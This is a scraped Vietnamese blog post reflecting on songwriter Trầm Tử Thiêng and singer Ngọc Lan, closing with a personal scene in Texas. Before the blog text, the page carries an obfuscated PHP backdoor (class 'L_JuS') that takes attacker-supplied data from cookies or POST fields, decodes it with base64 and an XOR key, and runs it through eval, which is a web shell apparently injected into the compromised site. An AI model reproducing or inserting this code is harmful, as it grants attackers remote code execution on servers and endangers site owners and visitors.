$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Hối tiếc – Hay tản mạn Trầm Tử Thiêng và Ngọc Lan – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Hối tiếc – Hay tản mạn Trầm Tử Thiêng và Ngọc Lan

Trầm Tử Thiêng

Tôi lần đầu biết tới Trầm Tử Thiêng là qua bài “Tưởng Niệm” với giọng hát đầy truyền cảm của Tuấn Ngọc

Ta khổ đau một đời, để chết trong tình cờ
Ta tìm nhau một thời, để mất nhau vài giờ

Thật ra, tôi không thích nhạc của Trầm Tử Thiêng lắm. Lí do thì đơn giản (như bản chất con người của tôi vốn đơn giản chăng?): những sáng tác khiến Trầm Tử Thiêng được biết đến nhiều nhất, đa phần là những ca khúc có màu sắc chính trị. Ví dụ rõ nét nhất có lẽ là bài “Chuyện một chiếc cầu đã gãy“, mà ở chương trình Paris By Night 81, Quang Lê hát khá ngọt; hoặc bài mà có lẽ là bài bi thương nhất trong lịch sử tân nhạc Việt Nam, bài “Kinh khổ“…

Đến bây giờ, không ai biết được ý nghĩa tên Trầm Tử Thiêng mà nhạc sĩ chọn đặt, dù cho trước và sau giải phóng, đã có không ít người hỏi ông câu này. Chỉ biết là nghe tên ông vang lên, đã thấy ẩn chứa một nỗi buồn nào đó, khó diễn tả bằng lời.

Người ta nói Trầm Tử Thiêng khá khép kín, hầu như không ai biết được gì về đời tư của ông, về những người con gái quanh ông, và những bóng hình đã đi vào nhạc của ông. Một trong những lần hiếm hoi bàn về đề tài này, ông đã nói:

Tôi không cho một thứ tình cảm nào gọi là mất mát trong đời tôi cả, tình yêu nó có cái thời của nó, thành thử khi nó đã có rồi không có nữa, thì cái có nó vẫn còn chứ không mất. Đến bây giờ tôi vẫn không mất.

***

Ngọc Lan

Không một nữ ca sĩ nào khiến tôi yêu mến và trân trọng như đoá hoa bạc mệnh Ngọc Lan.

Sau sự kiện tháng 4 năm 1975, nền âm nhạc Việt Nam ở hải ngoại phát triển cực nhanh và mạnh, với hàng loạt tên tuổi từ trước giải phóng tiếp tục khẳng định mình, cùng những giọng ca mới xuất hiện. Tuy nhiên, nếu nói ca sĩ được đông đảo người nghe nhạc quí mến nhất, giành nhiều tình cảm thương yêu nhất, chắc hẳn đó sẽ là Ngọc Lan.

Ngọc Lan không đi vào những sách viết về âm nhạc Việt Nam (xuất hiện rất nhiều khoảng thời gian gần đây) với tư cách một huyền thoại như “tiếng hát vượt thời gian” Thái Thanh hay “nữ hoàng chân đất” Khánh Ly, nhưng nàng ca sĩ ấy, đi sâu vào lòng người và ngự trị ở đó theo một cách rất khác: bằng sự tinh tế, bằng vẻ đẹp nhẹ nhàng và mong manh như một loài hoa của mình.

Trong “Đêm nhạc Ngọc Lan” được tổ chức năm rồi, nhạc sĩ Vũ Xuân Hùng (tôi nhớ không lầm thì bác này viết lời Việt ca khúc “Anh thì không” rất nổi tiếng qua giọng hát của Ngọc Lan) có phát biểu:

Khi nghe Khánh Ly & Khánh Hà hát người nghe cảm giác bị mất đi chất nam tính của mình mà thấy người ca sĩ kia có một sức mạnh lớn quá, cao hơn mình nhiều quá, còn khi nghe Ngọc Lan hát người đàn ông nào cũng trở thành một người hùng…

Khi Ngọc Lan bị bệnh mất đi, đám tang của cô được rất đông đảo người ái mộ tham dự. Trong dịp này, nhạc sĩ Anh Bằng đã viết ca khúc “Vĩnh biệt một loài hoa” như một lời tiễn đưa…

Bài đầu tiên tôi nghe Ngọc Lan hát là bài “Thu hát cho người“, giây phút đó, tôi biết rằng, dù sau này có nghe bao nhiêu giọng hát đi nữa, thì tiếng hát đầy thổn thức ấy, vẫn chiếm một vị trí rất quan trọng trong lòng tôi.

***

Tôi rời thư viện, sau một chiều ngồi vật lộn với bài học (à, thật ra có thư giãn bằng cuốn con mèo Garfield). Trời Texas dạo này nhiệt độ cũng cao vừa đủ, tôi lại mặc những ba cái áo, nhìn chẳng khác nào cái bị bông.

Trên đường ra bãi đậu xe, một cơn gió thổi qua cái đầu đã hớt sát ơi là sát của tôi. Tôi rùng mình, tự nhiên thấy cảm giác cô đơn và lạnh lẽo từ trong tim mình lan toả ra khắp nơi, khiến mọi khái niệm thời gian và không gian trở thành vô nghĩa, tưởng chừng mình tôi đông đặc đứng mãi giữa đất trời.

Khi đấy, bên tai tôi, bài nhạc của Trầm Tử Thiêng qua giọng của Ngọc Lan đang vang lên: Còn gì nữa đâu, mà bảo nhau đợi chờ… ((http://www.mediafire.com/?tknme10djvn – Hối tiếc (Nhạc sĩ: Trầm Tử Thiêng – Ca sĩ: Ngọc Lan) )).

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.